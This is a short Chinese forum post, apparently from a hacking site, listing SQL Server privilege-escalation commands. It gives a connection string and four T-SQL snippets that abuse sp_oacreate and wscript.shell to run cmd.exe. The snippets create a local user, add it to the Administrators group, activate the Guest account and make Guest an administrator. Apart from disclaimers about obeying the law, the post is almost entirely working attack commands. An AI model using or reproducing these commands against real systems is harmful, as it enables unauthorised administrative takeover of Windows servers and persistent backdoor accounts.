HanDs
NO.2

SQL提权命令 





学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全

本站需要登陆后才能查看

1、连接数据库

driver={SQL
Server};server=服务器IP;uid=用户名;pwd=密码;database=数据库名

2、添加新用户

declare @shell int exec sp_oacreate
'wscript.shell',@shell output exec sp_oamethod
@shell,'run',null,'c:windowssystem32cmd.exe /c net user 新用户 密码
/add'

3、把用户加到管理组

declare @shell int exec sp_oacreate
'wscript.shell',@shell output exec sp_oamethod
@shell,'run',null,'c:windowssystem32cmd.exe /c net localgroup administrators
新用户 /add'

4、激活GUEST用户

declare @shell int exec sp_oacreate
'wscript.shell',@shell output exec sp_oamethod
@shell,'run',null,'c:windowssystem32cmd.exe /c net user guest
/active:yes'

5、把Guest加到管理组

declare @shell int exec sp_oacreate
'wscript.shell',@shell output exec sp_oamethod
@shell,'run',null,'c:windowssystem32cmd.exe /c net localgroup Administrators
Guest /add'


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
SQL 提权命令
#1楼
发帖时间:2016-7-23   |   查看数:0   |   回复数:0
游客组